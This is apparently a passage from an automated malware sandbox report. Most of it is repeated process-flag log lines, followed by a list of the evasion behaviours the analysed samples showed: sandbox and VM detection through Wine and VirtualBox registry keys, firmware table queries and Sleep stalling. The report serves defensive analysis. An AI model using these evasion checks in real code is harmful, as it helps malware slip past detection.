                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Found API chain indicative of sandbox detection
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_4-96859
                                Found stalling execution ending in API Sleep call
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeStalling execution: Execution stalls by calling Sleep
                                Query firmware table information (likely to detect VMs)
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
                                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile opened: HKEY_CURRENT_USER\Software\Wine
